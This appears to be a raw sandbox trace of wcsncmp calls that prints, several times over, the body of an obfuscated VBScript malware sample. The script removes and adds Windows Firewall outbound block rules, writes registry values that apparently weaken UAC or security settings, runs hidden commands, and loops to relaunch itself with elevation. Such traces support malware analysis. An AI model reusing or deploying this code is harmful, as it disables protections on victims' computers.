1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0222.968] wcsncmp (_String1="\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0222.968] wcsncmp (_String1="s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.968] wcsncmp (_String1="1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.968] wcsncmp (_String1=" = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.968] wcsncmp (_String1="= Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 